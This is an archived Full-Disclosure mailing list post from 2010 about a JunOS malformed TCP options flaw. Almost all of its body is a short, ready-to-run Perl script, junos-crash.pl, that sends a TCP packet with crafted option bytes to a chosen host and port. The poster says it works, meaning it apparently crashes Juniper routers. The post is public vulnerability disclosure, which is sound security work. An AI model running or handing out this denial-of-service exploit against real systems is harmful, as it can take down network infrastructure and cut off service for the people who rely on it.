full-disclosure-uk January 2010 archive
Main Archive Page > Month Archives  > full-disclosure-uk archives
full-disclosure-uk: [Full-disclosure] JunOS malformed TCP option

[Full-disclosure] JunOS malformed TCP options vulnerability

From: Jeremy L. Gaddis <jeremy_at_nospam>
Date: Sun Jan 10 2010 - 02:31:47 GMT
To: full-disclosure@lists.grok.org.uk


This works for me:

$ cat junos-crash.pl

#!/usr/bin/perl my $host = shift; my $port = shift; use Net::Packet qw($Env); use Net::Packet::IPv4; my $ip = Net::Packet::IPv4->new(dst => $host); use Net::Packet::TCP; my $tcp = Net::Packet::TCP->new( dst => $port, options => "\x65\x02\x01\x01", ); use Net::Packet::Frame; my $frame = Net::Packet::Frame->new(l3 => $ip, l4 => $tcp);

$frame->send;

exit 0; -- Jeremy L. Gaddis http://evilrouters.net/ _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/